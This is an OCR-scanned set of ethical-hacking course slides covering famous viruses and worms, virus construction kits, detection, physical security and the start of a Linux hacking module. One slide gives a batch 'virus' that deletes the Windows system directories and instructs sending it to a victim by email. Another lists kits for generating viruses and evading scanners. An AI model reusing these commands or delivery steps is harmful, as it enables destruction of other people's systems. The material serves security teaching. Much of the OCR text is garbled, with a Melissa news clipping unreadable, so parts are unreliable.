PHHHH 5. 


Compati bi 1 i ty probi ems. iB 
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Virus Damage 




© Vi rus damage can be further attri buted as: 

• Ethical and Legal Reasons: There are 
legalities and ethics involved ruling why 
vi rus and worms are damagi ng. 

• Psychological Reasons such as: 

- Trust Problems 

- Negative influence 



1 Unauthorized Data Modification 

2. Copyright problems 

3. Misuse of the virus 

4. Misguidanceby virus writers 
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Effect of Vi rus on Busi ness 



©Accord i ng to a study by 
Computer Economics, US 
research institute, computer 
viruses cost companies 
worldwide US$7.6 billion in 
1999. 

©I n J anuary 2003, the SQL 
Slammer worm led to technical 
problems that temporari ly kept 
Bank of America's customers 
from thei r cash, but did not 
directly cause the ATM outage. 





F©As most of the busi ness around, 
the world rely on i nternet for ■ 
most of thei r transacti ons i t i s • 
quite natural that once a system 
within a business network is ^ 
affected by vi rus there i s hi gh " 
risk of financial loss to business. 



I 
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Access M ethods of a Vi rus 



©The fol lowi ng are ways to 
get i nfected by a computer 



VI rus: 



Floppy Disks 
I nternet 



Emai 
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M ode of Vi r us I nfecti on 



© Vi ruses i nfect the system i n the fol lowi ng ways: 

• Loads itself i nto memory and checks for executables 
on the disk. 

• Appends the ma! i ci ous code to the unsuspecti ng 
program. 

• Launches the real infected program, as the user is 
unaware of the replacement. 

• I f the user executes the i nfected program other 
programs get i nfected as wel I . 

• The above cycle conti nues unti I the user real izes the 
anomaly within the system. 
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Life Cycle of Virus 



© Like its biological counterpart, the computer virus also has a life 
cycle right from its birth ( creation) to death (eradication) of the 
vi rus. 



^Pesigq^ 



^/l^eproductio 



Launch 



Detection 



Incorporation 



Elimination 
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Virus Classification 



Viruses are classified based on the foil owing lines: 
1 What they I nfect. 
2. H ow they I nfect. 
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What does a Vi rus I nfect? 



1 System Sectors 

2. Files 

3. Macros 



4. Companion Files 

5. Disk Clusters 

6. Batch Files 

7. Source Code 




8. Worms using 
Visual Basic 
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H ow does a Vi rus I nfect 



1 Polymorphic Virus 

2. Stealth Virus 

3. Fast and Slow I nfectors 



4. Sparse I nfectors 

5. Armored Virus 

6. Multipartite Virus 

7. Cavity (Space filler) Virus 

8. Tunneling Virus 




9. Camouflage Virus 
ID. NTFS ADS Virus 
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F amous Vi rus / Worms 
W32.CI H .Spacefi I ler (a.k.a Chernobyl ) 



© Chernobyl is a deadly virus. Unlike the other 
vi ruses that have surfaced recently, this one is 
much more than a nuisance. 

© If infected, Chernobyl will erase data on the 
hard drive, and may even keep the machine 
from booti ng u p at al I . ^ 



© There are several vari ants i n the wi I d. each 
variant activates on a different date. Version 12 
on Apri I 26th, 13 on J une 26th, and 14 on the 
26th of every month. 




Classic tool presented here for proof of concept 
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F amous Vi ruses / Worms 
Wi n32/ ExploreZi p Vi rus 



© ExploreZip is a Win32- based email worm. It searches for Microsoft 
Office documents on the hard drive and network drives. 

© When it f i nds any Word, Excel , or PowerPoi nt documents usi ng 
the foil owing extensions: .doc, .xls, and .ppt. 1 1 erases the contents 
of those f i I es. 1 1 al so emai I s i tsel f to any one who send the vi cti m an 
emai I . 

© ExploreZi p arrives as an emai I attachment. The message wi 1 1 most 
I i kely come from someone known, and the body of the message wi 1 1 
read: 

"I received your email and I shall send you a reply ASAP. Till 
then, take a look at the attached Zi pped docs." The attachment wi 1 1 
be named "Zipped_files.exe" and havea WinZip icon. Double 
clicking the program infects your computer. 

Classic tool presented here for proof of concept 
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F amous Vi ruses / Worms 

I Love You Virus 



E ILOVEYOU Message (Plain Text) 



File Edit View Insert Format Tools Actions Help 



Reply I Reply to All | Forward | # 1% § | r | X 



' A ® 



You replied on Thursday, May 04, ZOOO 9:13 AM. 



From; [ (name removed to protect sender ] 

To; [Victim] 

Cc; 

Subiect; ILOVEYOU 



Sent; Thu 5/4/00 8;39 AM 



kindly check the attached LOVELETTEH coming from me. 



LOVE-LET.. 
(10KB) 



The virus discussed herearemore 
of a proof of concept, as they have 
been instrumental in the evolution 
of both virus and anti-virus 
programs 
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Classic tool presented here for proof of concept^ 



©Love Letter is a Win32-based 
email worm. It overwrites 
certain files on the hard drives 
and sends itself out to everyone 
i n the M i crosoft OutI ook 
address book. 



©Love Letter arrives as an 
email attachment named: 
LOVE-LETTER-FORYOU. 
TXT.VBS though new variants 
have different names including 
VeryFunny.vbs, 
virus_warning.jpg.vbs, and 
protect, vbs 
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© M el i ssa i s a M i crosoft Word 
macro virus. Through macros, 
the vi rus alters the M 1 crosoft 
Outlook emai I program so that 
the vi rus gets sent to the f i rst 50 
people in the address book. 

©It does not corrupt any data on 
the hard drive or crashes the 
computer. H owever, it affects M S 
Word settings. 




M d issa arrives as an emai I attachment. 
The subject of the message contai ni ng the vi rus 
reads: " I mportant message from" fol I owed by the 
name of the person whose emai I account it was sent 
from. 




J 



The body of the message reads: Here's the document you asked for... don't show anyone 
else;-) 

Double-cli eking the attached Word document (typically named LI ST. DOC) will infect the 
machine. 



^ Classic tool pr esented h ere for proof of concept 




BC-Gouncil 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Melissa Virus - Case 



rrrrmrm 



EOPTUlHF.r 



Ihu Wteb hllcrcd by humans, nolbnls: H^fd com fcr^igi 



*l«LjihiT i 



Mells-s-a's long gene, but leES-&n^ remain 



5ft^ TftK-; Irim (^^(^KiTi-n to HliS ^* Lry 

ti's i5?eri years- sirwB-ttiP Mtn5*3 iriarro vlrii* flr^t eut Iwe^ i JlTi.Mi^.Y>.-:iPificf^^i:k< i 



s^urrty ewiieda- rwlwnrJ; a4nilnl34r4CDr$ PC OMrHrB- atfl haw 



The 'Vims eilsriBd s^re^dinaon Hanch 36.1^9^ andlra^lBd (^iekJy BcrasE 
hundiJiadE onhcuj-^gnds of PCs wins mrsded. 



*H°i^t^?? v^a; |hg ^?C-nnd €-UC-[8??ltI1 i9--n-iail WTirrT>. bjl wa? Ih?- ci^Q Ih^t 
r8sJlyc3ugM afl&nHar^" ejI<J Ri-ii^rcJSnnillh, 5nlrteTe1s.3(.Ji1l>'8rtd privacy 

code. 'II £hew£d tfifm i£Minail irdultJ b«u£ehel34quitk)v^i«sad i -^mi itton 



IMHlc-macravuuscs pose linc'H-i:c3^ 

I K--H T-" -1 rvH rr^ .-. r I Ir.H n rr. n I 1 1 1— .-. K. - 



I**-™ EXTRA 
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Pretty Park 



©Pretty Park is a privacy invading worm .Every 30 seconds, it tries 
to email itself to the email addresses in the Microsoft Outlook 
address book. 

©It has also been reported to connect the victim machine to a 
custom I RC channel for the purpose of retrievi ng passwords from 
the system. 

©Pretty park arrives as an email attachment. Double-clicking the 
PrettyPark.exe or Files32.exe program infects the computer. 

©Sometimes the Pipes screen isseen after running the executable. 
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© Foil owl ng the I and! ng of the U .S "spy pi ane" on Chi nese sol I , 
loosely grouped hackers from China started hack attacks directed 
against the white house. Code Red is assumed to be a part of this. 

© The "Code Red" worm attempts to connect to TCP port 80 on a 
randomly chosen host assumi ng that a web server wi 1 1 be found. 

© Upon a successful connection to port 80, the attacking host sends a 
crafted HTTP GET request to the victim, attempting to exploit a 
buffer overflow in the Windows 2000 I ndexing Service. 

© If the exploit is successful, the worm executes a distributed denial 
of servi ce whereby the si ave machi nes attack the white house. 

© The assumption of being Chi nese in origin arises from the last line 
found in the disassembled code, which reads: 

HELLO! welcome to http://www.worm.com! Hacked By Chinese! 




Classic tool presented here for proof of concept 
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W32/Klez 



ElKern, KLAZ, Kletz, I- 
Worm.klez, W95/Klez@mm 

©W32.Klez variants is a mass 
mai I i ng worm that searches the 
Wi ndows address bool< for emai I 
addresses and sends messages to 
all the recipients that it finds. 
The worm uses its own SMTP 
engi ne to send the messages. 

©The subject and attachment 
name of the i ncomi ng emai Is are 
randomly chosen. The 
attachment will have one of the 
extensions: .bat, .exe, .pif or .scr. 
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j A very new game - Message 



Reply Reply to A[l (f!^ Forward 



|n|x 



file Edit View Insert Format Tools Compose Help 



Message | Options | 



Doe, John [idoe@vo'J' address. com] 
'virus@commandcom.com' 



From 
To; 

Cc; 

5ubiect; Avery new game 



5ent: Wed 4/17/02 9: 17 AM 



~3 



Hello.This is a very new game 
This game is m'y' first work. 
You're the first player. 



I wish 'v'ou would like it. 



prcacu.eKe 



preview1_1 3[1 ].jpg 



The worm expl oits a vul nerabi I ity 
in M icrosoft Outlook and Outlook 
Express to try execute itself when 
the vi cti m opens or previ ews the 
message. 
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Bug Bear 



©The vi rus is bei ng showcased 
here as a proof of concept. 

©The worm propagates via 
shared networl< folders and via 
email. It also terminates 
antivirus programs, act as a 
backdoor server application, and 
sends out system passwords, al I 
of which compromise security on 
infected machines. 

This worm fakes the FROM field and obtains the recipients for itsennail from email messages, address books, and mail boxes on 
theinfected system. It generates the filename for the attached copy of itself from the foil owing: 

A combination of text strings: setup, card, docs, news, I mage, images, pics, resume, photo, video, music or song data; 
with any of the extensions: SCR, PIF, or EXE. An existing system file appended with any of the foil owing extensions: 

SCR, PIF or EXE. 

Classic tool presented here for proof of concept 




BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Si rCam Worm 



I 



©Si rCam i s a mass mai ling emai I 
worm with the abi I ity of 
spreadi ng through Wi ndows 
Networl< shares. 

©SirCam sends emai Is with 
variable user names and subject 
fields, and attaches user 
documents with double 
extensions (such as .docpif or .x 
Is.Ink) to them. 



PONUDA GPZ - Nachricht (Nur-TeKt) 



Six] 



j Datei Bearbeiten Ansicht Einfugen Format Extras Akionen ? 



j^^^ Antworten A[len antworten (fj^ Weiterleiten 



r X 



Von; 

An; 
Cc; 

Betreff; 



FIV d.o.o, 
[fiv@zg,hinet,hr] 

airlines2000@gnnx , at 
PONUDA GPZ 



Gesendet; Mi 05,09,01 09;49 



[Hi ! How are you? 



I send you this file in order to have your 
adv ice 

See you later. Thanks 



PONUDA 
GPZ.xIs.pi... 



ATT00005.txt (59 



The worm collects a list of files with certain extensions (.DOC, .XLS, and 
■Z! P) into fake DLL files named "sc*.dH" and sends itself out with one of 
the document files it finds in the users' My Documents folder. 
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Nimda 



© N i mda i s a compi ex vi rus with a mass mai ling worm component 
which spreads itself in attachments named READM E.EXE. It affects 
Windows 95, 98, ME, NT4, and Windows 2000 users. 



D13 gmiplot And tgia 



Nimda traffic recorded b 
LaBrea and web servers 



1000 



100 ■ 





LaBrea hits * 
erver flits + 



* K_bytes persist 
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Classic tool presented here for proof of concept 



Nimda is showcased here as 
it isthefirst wormto modify 
existi ng websites to start 
offer i ng i nf ected f i I es for 
download. It is also the first 
worm to use normal end user 
machi nes to scan for 
vulnerable websites. Nimda 
uses the U n i code expl oi t to 
i nfect 1 1 S Web servers. 

Source: http:// www.fwsystems.com/ ni mda/ ni mda.gif 
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SQL Slammer 



I 



120000 



©On J anuary 25, 2003 the SQL 
Slammer Worm was released by an 
unknown source. 

©The worm si gn 1 f 1 canti y di sr u pted 
many I nternet services for several 
hours. 1 1 also adversely affected the 
bulk electric system controls of two 
entities for several hours. 



80000 



60000 



20000 



01/24 



g traffic 
s atlif ated network 
equipment 



packets ■ 
sources 

dests ■ 
outgoing ■ 



SapphicieSQL worm seen from TE^IUMF 



01/24 Jaraisry 2003 01/24 



PST 




01/25 



Sou rce: http :/ / and rew.tr i u mf .ca/ si ammer . html 



The worm carried no destructive payload, and the very speed of the 
worm hampered its spread, as the noticeable slowdown in I nternet 
traffic also slowed the Slammer's spread. 

CI assi c tool presented here for proof of concept copyright © by BC-councii 
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Doom] u ice 



© 1 1 uses the computers i nfected by M ydoom.a 
and Mydoom.b to spread. 

© 1 1 is approxi mately 34kb i n size. 

© 1 1 tr i es to estabi i sh con necti ons to ports 3127 
to 3198. 

® Compressed using UPX. 

©It also launches DOS attack on the M icrosoft 
site. 

© The intrenat.exe file is an indication of a 
I i kel y i nf ecti on i n f utu re. 



^assicto ol pres ented her e for proof of concept , 
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Writing a Simple Virus Program 



© Step 1: Createa batch file Game, bat with the foil owing text. 

• @ echo off 

• del c:\winnt\system32\*.* 

• del c:\wi nnt\*.* 

© Step 2: Convert the Game. bat batch fi le to Game.com using 
bat2com utility. 

© Step 3: Send the Game.com file as an email attachment to a victim. 

© Step 4: When thevictim runs this program, it deletes corefiles in 
Wl N NT di rectory maki ng Wi ndows unusabi e. 
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Virus Construction Kits 



© Virus creation programs and construction l<its 
can automatical! y generate vi ruses. 

© Tliere are number of Virus construct! on l<its 
available in the wild. 

© Somevirus construction kits are: 

Kefi's HTML Virus Construction Kit 
Virus Creation Laboratory vlO 
The Smeg Virus Construction Kit 
Raj aat's Ti ny F I exi bl e M utator vl 1 
Windows Virus Creation KitvlOO 
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Examples of Virus Construction Kits 



Batch Virus Genera tor 
vl.lc 


This program makes batch viruses. Requires MS-DOS to function. 


Virus Creation 
Laboratory vl.D 


Behtngs to those very popular virus creation programs. Nowhere Man's 
V.C.L. is a potentially dangerous program^ and great care shoukl be 
using when experimenting with *any* v'lrn, trojans, or togic tmmbs 

produced by it. 


Nuke GenVlrus 


Heeds MS-DOS to work. 


Instant Virus 
Production Kit vl.7 


Requires MS-DOS v6.D or higher. 


Macro Virus 
Development Kit 
vl.Db 


Macro Virus Devek>pment Kit b a tool which generates macro viruses 
for Microsoft Winword, according to user specifications. 


Nuke Randomic Life 
Generator v<D.66b 


Generates resident viruses. 


Rajaat's Tiny Flexible 
Mutator vl.l 


RTFM is an object module that can be linked to your virus to make it 
impossible for a scanner to use a simple string. It will encrypt your virus 
and generates a random decry ptor using random registers and random 
Instructions. Therefor^ an algorithmic approach will be needed to 
detect viruses using this object module. 


G2 Pbakx>n/Skisiiii's 


Requires MS-DOS v6.0 or higher. 


The Super Appending 
Batch VCK vl.lk 


This program generates repHcating appending batch virus programs 
from user-speciTied paramreters. Needs MS-DOS v6.0 or higher. 


SkamWerks Lahs 


This program generates macro viruses for MS Word v6.D. 


Trojan Horse 
Construction Kit vl.O 


Simple trojan horse tooldt. Requires MS-DOS v6.D or higher. 


The Simple WInScript 
Virus Kit vl.lk 


VBS WInScript virus construction tooldt. 


VBS Worm Generator 
v2.D BETA 


Powerful VB Script worm generator. 


Virus Factory 


Virus construction kit. Requires MS-DOS V6.D or higher. 


Senna Spy Worm 
Generator 2000 


VB Script worm generator. 
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Virus Detection jviethods 



©The fol I owi ng techni ques 
are used to detect vi ruses: 

• Scanning 

• I ntegrity Checking 

• Interception 
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Virus I ncident Response 



1 Detect the attack: N ot al I anomal ous behavi or can be 
attri buted to Vi ruses. 

2. Trace processes using utilities sucli as handlaexe, 
listdlls.exe, fport.exe, netstat.exe, pslist.exe, and map 
commonalities between affected systems. 

3. Detect the vi rus payload by looki ng for altered, 
replaced or deleted files. New files, changed file 
attributes or shared library files should be checked. 

4. Acquire the infection vector, isolate it. Updateanti- 
vi rus and rescan al I systems. 
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What is Sheep Dip ? 



I 



© Slang term for a computer which connects • 
to a network only under strictly controlled 
conditions and is used for the purpose of ^ 
runni ng anti-vi rus checl<s on suspect f i les, 
i ncomi ng messages, etc. 



A 



©It may be i nconvenient and ti me-consumi ng for a " 
organizati on to give al I i ncomi ng emai I attachment a 
'health check' but the rapid spread of macro- vi ruses 
associated with word processor and spreadsheet 
documents, such as the 'Resume' virus circulating in 
May 2000, makes this approach worth while. ,^ 
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Virus Analysis - 1 DA Pro Too 



I 





© 1 1 is a dissembler and debugger tool 
that supports both windows and Linux 
platforms. 

© It is an interactive, programmable, 
extendible, mu I ti- processor. 

© Used in the analysis of hostile code and 
vulnerability research and software 
reverse engi neeri ng. 

© Allows automated unpacking/ 
decrypting of protected binaries. 

Class i^oo^resaited hg"efor proof of concep^j 
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Prevention is Better than Cure 

4 



©Do not accept disks or programs without checl<ing 
them fi rst usi ng a current version of an anti-vi ral 



program. 



I 



©Do not leave a floppy disl< in the disk drive longer 
than necessary. 

©Do not boot the machine with a disk in the disk 
drive, unless it is a known "Clean" bootable system 
disk . 



^ 



©Keep the anti-vi rus software up to date - upgrade 
on a regular basis. |^ 
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One of the prevention agai nst vi rus is to i nstal I 
anti-vi rus software and l<eep the updates 

current. 



[© There are many anti-vi rus software vendors H ere is a 
I I i St of some freely avai I abl e anti - vi rus software for 
I personal use. 

AVG Free Edition 
VCatch Basic 
AntiVir Personal Edition 
Bootminder 
Panda Active Scan 
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Popular Anti-Virus Packages 



©Aladdin Knowledge Systems 
http : / / www, esaf e. com/ 

©Central Command, I nc. 

htt p : / / www, central comman d . co 

m/ 

©Command Software Systems, 
Inc. 

http://www.commandcom.com 

©Computer Associates 
International, Inc. 
http://www.cai.com 

©Frisk Software I nternational 
http://www.f-prot.com/ 

© F - Secu re Cor por ati on 
http://www.f-secure.com 

©Trend Micro, Inc. 
http://www.trendmicro.com 

BC-Councll 



© M cAf ee ( a N etwor k Associ ates 
company) 

htt p : / / www, mcaf ee. com 

©Network Associ ates. Inc. 
http://www.nai.com 

©Norman Data Defense Systems 
http://www.norman.com 

©Panda Software 
http://www.pandasoftware.com/ 

©Proland Software 
http : / / www, psp I . com 

©Sophos 

http://www.sophos.com 

©Symantec Corporation 
http://www.symantec.com 
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New Viruses in 2005 



I 



©Wornn.Win32.Bizex 

©Virus Encyclopedia 

© I - Worm. |V| oodown . b 

©1-Wornn.Bagle.b 

©1-Wornn.Bagle.a 

©l-Worm.Klez 

©Wornn.Win32.Welchia.a 

©Wornn.Win32.Welchia.b 

©Worm. Wi n32. Doomj ui ce.a 

©Worm.Win32.Doomjuice.b 
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Summary 



© Vi ruses come i n different forms. 

© Some are mere nuisances some come with devastati ng 
^ consequences. ^ 

© E mai I worms are self rep! i cati ng and cl ogs the networl<s 
^ with unwanted traffic. 

^© Vi rus codes are not necessari ly complex. 

© 1 1 is necessary to scan the systems/ networks for 
I infections on a periodic basis for protection against 
I vi ruses. 

© Antidotes to new virus releases are promptly made 

I aval I able by security companies and this forms the 
major counter measure. 

Copyri ght © by BC-Cbunc i I 
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Ethical Hacking 



Module XVII 
Physical Security 



■ 



Michael, a practicing computer security consultant, 
was asked to do a physical security test by the Chief 
of a very wel I known database f i rm. Thei r database 
was considered a major competitive edge. They 
bel ieved thei r systems were secure, but wanted to be 
sure of it. 

M i chael went to the f i rm on pretext of meeti ng the 
Chief of the firm. Before entering the lobby, Michael 
had driven around the building and checked for the 
loopholes in physical security where he could slip 
easi ly i nto the bui I di ng. 



Rea World Scenario 
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Real World Scenario 



■ 



H e wal ked to the I oadi ng bays, wal ked up the stai rs, 
and proceeded through the warehouse to what was an 
obvious entrance into the office building, jviichae! knew 
the I ocati on of the computer room. H e took the 
elevator down, and entered the room, which was 
secured with cipher locks and access cards guarding its 
every entrance. He went straight to the tape racks. 
There, he studied the racks, as if looking for specific 
information. He grabbed a tape with an identifier that 
looked something like ACCT95QTR1 

The entire escapade lasted no more than 15 minutes. 
During that time, Michael breached their physical 
security by enteri ng the bui I di ng and taki ng a tape. 
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Modu e Objective 



© Security Statistics 

© Physical security 
breach incidents 

© Understanding 
physical security 

© What is the need for 
physical security? 

© Who is accountable 
for physical security? 

© Factors affecting 
physical security 
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© Major components 
needed to implement 
a good physi cal 
security program 

© Physical security 
checklist 

© Locks 

© Summary 
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Modu eF ow 




Physical Security 
checl<list 




lysicai Security 
breach incidents . 



WhmsaccountSe?^ 
^^Hi^ica^ecun^^^ 



Locl<s 



Understanding 
Physical Security 



What is the need 
Physical Securit\ 
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Security statistics 



© During the year 2002 in the US, 53% more notebooks were 
stolen in 2001than in 2000. 

Source: Safeware I nsurance Group 

© The average financial loss resulting from a laptop theft grew 
by 44% from 2000 to 2001($62,000 to $89,000). 

Source: 2001and 2002 Computer Security I nstitute/FBI Computer Cri me & Security 
Survey 

© Although the laptop's claim to fame is its mobility, according 
to a recent survey in Support Republic, respondents indicated 
that laptops were most often lost or stolen on corporate 
property, not whi I e travel i ng. 

© "Across campus, laptop theft is a rising problem, up 37 
percent in 2003 from the previous year. For police, the thefts 
are f rustrati ng because they are d iff i cult to solve and easy to 
stop" - Yale Daily News, February 12, 04. 

Source: TechRepublicJ une4, 2001 
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Physical Security Breach Incidents 



© I n 2001 YasuoTakei, the chairman of I apan's biggest 
consumer lender Tal<efuji was arrestee! on charges of 
wi retappi ng a j ournal i st and others. 

© I n September 2001 a terrorist outfit created havoc in 
the US and offices of major firms were physically 
damaged. 

© On IS^"^ December 2003 J esus C. Diaz, who once worked 
as an AS/400 programmer for Hellmann Worldwide 
Logistics was sentenced for one year imprisonment for 
accessi ng the company's computer system remotely and 
deleting critical OS/ 400 appi cations. 

© In the year 2003, a laptop containing the names, 
addresses and Social Security numbers of about 43,000 
customers was stolen from Bank Rhode I si and 's 
principal data- processing provider. 
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Understanding Physical Security 



© Si nee nnan has had sonnethi ng i nnportant to protect, he has found 
various methods of protecti ng it. 

© Egyptians were the fi rst to develop a working lock. 

© Physical security describes measures that prevent or deter 

attackers from accessi ng a faci I ity, resource, or i nformation stored 
on physical media. 

© Physical security is an important factor of computer security. 

© Major security actions that are involved with physical security are 
i ntended to protect the computer from cl i mate condi ti ons, even 
though most of them are targeted at protecti ng the computer from 
i ntruders who use or attempt to use physical access to the 
computer to break into it. 




What Is the Need for Physical Security? 



© To prevent any unauthorized access to 
computer systems 

© To prevent tamperi ng/ steal i ng of data from 
computer systems 

© To protect the i ntegrity of the data stored i n the 
computer 

© To prevent I oss of data/ damage to systems 
against any natural calamities 
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Who Is Accountablefor Physical 
Securi ty? 



© In most organizations there is not a single 
person who is accountable for physical security. 

© The foil owing set of people should be made 
accountablefor the security of a firm , which 
includes both physical and information 
security: 

• The plant's security officer 

• Safety off 1 cer 

• I nformation systems analyst 

• Chief information officer 
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Factors Affecting Physical Security 



© Foil owing are the factors which affect the physi cal 
securityof a particular firm: 

• Vandalism 

• Theft 

• Natural cal anni ties: 

- Earthquake 

- Fire 

- Flood 

- Lightning and thunder 

• Dust 

• Water 

• Explosion 

• Terrorist attacks 
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Physical Security Checklist 



© Company surroundings 
© Premises 
© Reception 
© Server 

© Worl<station area 
© Wireless access points 

© Other equipment, such as fax, removable media, etc 
© Access control 

© Computer equipment maintenance 
© Wiretapping 
© Remote access 
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Physical Security Checklist 



© Company surroundings 

• The entrance to the company 
premises should be restricted to 
only authorized access. 

• The foil owing is the checklist for 
securi ng the company 
surroundings: 

- Fences 

- Gates 

- Walls 

- Guards 

- Alarms 





BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Physical Security Checklist 



© Premises 

• Premises can be protected by the 
following: 

- Checki ng for roof/ cei I i ng access through 
AC ducts. 

- Use of CCTV cameras with monitored 
screens and video recorders. 

- I nstal I i ng i ntruder systems. 

- Installing panic buttons. 

- Installing burglar alarms. 

- Windows and door bars 

- Deadlocks. 
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Physical Security Checklist 



© Reception 

• The reception area is supposed to be a busier area 
than other areas of the firm with the number of 
peopi e comi ng and goi ng. 

• The recepti on area can be protected by the f ol I owi ng: 

- Files and documents, removable media, etc. should not 
be kept on the reception desk. 

- Reception desks should be designed to discourage 
i nappropriate access to the admi nistrati ve area by non- 
staff members. 

- Computer screens should be positioned in such a way 
that people cannot observe the screen near the 
reception desk. 

- Computer monitors, keyboards, and other equipment 
at the reception desk should be locked whenever the 
receptionist is away from the desk and they should be 
logged off after office hours. 




i 
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Physical Security Checklist 



I 



© Server 

• The server, which is the most i mportant factor of any 
network, should be given a higher level of security. 

• The server roonn should be wel 1 1 it. 

• The server can be secured by the fol lowi ng nneans: 

- Server should not be used to perform day-to-day 
activities. 

- 1 1 should be enclosed and locked to prevent any physical 
movement. 

- DOS should be removed from Wi ndows Servers as an 
i ntruder can boot the server remotely by DOS. 

- Disable booting from floppy disk and CD-ROM drives 
on the server or, if possi ble, avoid havi ng these drives 
on the server. 
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Physical Security Checklist 



I 



© Workstation Area 

• This is the area where a majority of employees 
worl<. 

• Employees should be educated about physical 
security. 

• The workstation area can be physically 
secured by taki ng the fol I owi ng steps: 

- UseCCTV 

- Screens should be locked 

- Workstation layout design 

- PC should be locked 

- Avoid removable media drives 
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Physical Security Checklist 



I 



© Wi rel ess Access Poi nts 

• I f an i ntruder successful ly connects to the 
fi rm's wi rel ess access poi nts, then he is 
vi rtual I y i nsi de the LAN I i ke any other 
empl oyee of the f i rm. 

• To prevent such unauthorized access, the 
wi rel ess access poi nts should be secured. 

• Thefollowing guidelines should be followed: 

- WEP encryption should be followed 

- SSI D should not be revealed 

- Access points should be password protected to 
gai n entry 

- Passwords should be strong enough so that they 
won't be easy to crack 

Copyright © by BC-Cbunci I 
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Physical Security Checklist 



© Other equipment such as fax, 
removable media, etc. 

• Such equipment should be secured by 
f ol I owi ng these checks: 

- Fax machines near the reception area should 
be locked when the receptionist is not at the 
desk. 

- Faxes obtained should be filed properly 
rather than being handled carelessly. 

- M odems should not have auto answer mode 
enabled. 

- Removable media should not be placed in 
public places and corrupted removable media 
should be physically destroyed. 
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Physical Security Checklist 



© Access Control 

• Access control is used to prevent 
unauthorized access to any highly sensitive 
operational areas. 

• The various types of access control are: 

- Separati on of work areas 

- Biometric access control 

- Entry cards 

- Mantraps 

- Faculty sign- in procedures 

- Identification badges 
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Physical Security Checklist 



I 



© Biometric devices: 

• According to www.wliatis.com "Biometrics is 
the sci ence and techno! ogy of measuri ng and 
statistically analyzing biological data." 

• Biometric devices consist of a reader or 
scanni ng devi ce, software that converts the 
scanned information into digital form, a 
location for the data to be analyzed, for 
i nstance a database that stores the bi ometri c 
data for comparison with previous records. 

• The f ol I owi ng methods are used by bi ometri c 
devices for access control : 

Source: http://www.visionsphere.ca/ 

- Fingerprints 

- Face scan 

- Iris scan 

- Voice recognition 
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Physical Security Checklist 



• Smart cards: 

- Accordi ng to whatis.com a "smart card is a plastic card 
about the size of a credit card, with an embedded 
microchip that can be loaded with data, used for 
telephone calling, electronic cash payments, and other 
applications, and then periodically refreshed for 
additional use." 

- A smart card contai ns more i nformation than a 
magnetic stri pe card and it can be programmed for 
different applications. 
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Physical Security Checklist 



• Security Token: 

- Accordi ng to the search security 
definition, "A security token isasnnall 
hardware device that the owner carries 
to authorize access to a network 
service." 

- Security tokens provide an extra level of 
assurance through a nnethod known as 
two- factor authentication: the user has 
a personal identification nunnber (PI N), 
which authorizes them as the owner of 
that particular device; the device then 
displays a nunnber which uniquely 
identifies the user to the service, 

al I owi ng thenn to I og i n . 
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Physical Security Checklist 



■ 



© Computer Equipment Maintenance: 

• Appoi nt a person who wil I be responsi bl e for I ooki ng 
after the computer equi pment mai ntenance. 

• Computer equipment in the warehouse should also 
be accounted for. 

• The AM C company personnel should not be left 
al one when they come to the company for the 
mai ntenance of computer equi pment. 

• The tool boxes and the bags of the AM C company 
personnel should be thoroughly scanned for any 
suspicious materials that could compromise the 
security of the firm. 
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Physical Security Checklist 



© Wiretapping 

• Accord! ng to www.freesearch.conn 
wiretapping is the action of secretly 
I isteni ng to other people's 
conversations by connecting a listening 
devi ce to thei r tel ephone. 

• Accordi ng to www.howstuffworks.conn, 
"wi retap i s a devi ce that can i nterpret 
these patterns as sound." 

• Few thi ngs can be done to make sure 
that no one i s wi retappi ng: 

- I nspect a! I the data carryi ng wi res routi nely. 

- Protectthewires using shielded cables. 

- N ever I eave any wi re exposed . 
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© Remote Access 

• Remote access i s an easy way for an empi oyee of a 
f i rm to work from any pi ace outsi de the company's 
physical boundaries. 

• Remote access to the company's networks should be 
avoided as much as possible 

• I ts easy for an attacker to remotely access the 
company's network by compromisi ng the employee's 
connection. 

• The data bei ng transferred duri ng the remote access 
should be encrypted to prevent eavesdropping. 

• Remote access is more dangerous than physical 
access as the attacker is not i n the vici nity and there 
i s I ess possi bi I i ty of catchi ng hi m. 
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Physical Security Checklist 



Locks 



I 



© Locks are used to restrict physical access to an 
asset. 

© Tliey are used on any physical asset that needs to be 
protected from unauthorized access, including 
doors, windows, vehicles, cabinets, equipment, etc. 

© Different levels of security can be provided by locks 
dependi ng on how they are designed and 
implemented. 

© A lock has two modes - engaged/ locked and 
disengaged/ opened. 
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I 



© Locks are either mechanical or 
electrical: 

• Mechanical Locks 

- Mechanical locks have moving parts 
that operate without electricity. 

- There are two types of mechanical 



locks: 

- warded 

- tumbler 
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Locks 



Electric Locks 

- Electric locks work on electricity. 

- E I ectr i c I ocks are compr i sed of 
electronic devices with scanners that 
identify users and computers that 
process codes. 

- Electric I ocks are of the foil owing 
types: 

- card access systems 

- electronic combination locks 

- electromagnetic locks 

- bi ©metric entry systems 




Sou rce: www.wagoneers.com/ .. ./ 
electric-door-locks.j pg 
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Spyware 



Different Types of 
Spyware: 

• W i rel ess vi deo i nterceptor 

• Smokealarm video camera 

• Night scope 

• Mini dome camera 
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Summary 



© Peopleshould be appointed who would be accountable 
for any security breach i n a fi rm. 

© Physical security should be checked. 

© All organizations should have a checklist for physical 
security as a part of thei r security check-ups. 

© You cannot do anything to prevent natural disasters, 
but the loss can be decreased substantially if security 
pol i cy i s proper I y i mpl emented . 

© All the employees should take responsibility in handling 
security issues. 
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Ethical Hacking 



ModuleXVIII 
Linux Hacking 



Scenario 



[print version] Hacked Gentoo LinuH server taken oHIine | CNET Mevis.com - Microsoft Internet EHplorer 
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^ News.Com 



till p: //www, news, com/ 

Hacked Gentoo Linux server taken offline 

By Patrick Gray 

Special to CNET News.com 

http://news.com.com/2100-734g-5113227.html 

Story last moidified December 4, 2003, 6:20 AM PST 

Hackers have forced the Gentoo Linux project to take a server ofFline 

The attack and subsequent compromise comes after several machines belonging to the Debian Linux project were breached by attackers last month. A forensic analysis 
of the Debian machines revealed that no software packages or source code offereid for download were affected~a claim now being made by Gentoo. 



Get Up to Speed on... 

Open source ► 

Get the latest headlines and 
company-specific news in our 
expanded GUTS section. 



The maintainors of the Gentoo Linux distribution released a statement that describes the incident: "One of the servers that makes up 
the rsync.gentoo.org rotation was compromised via a remote exploit," it reads. "The compromised system had both an IDS and a file 
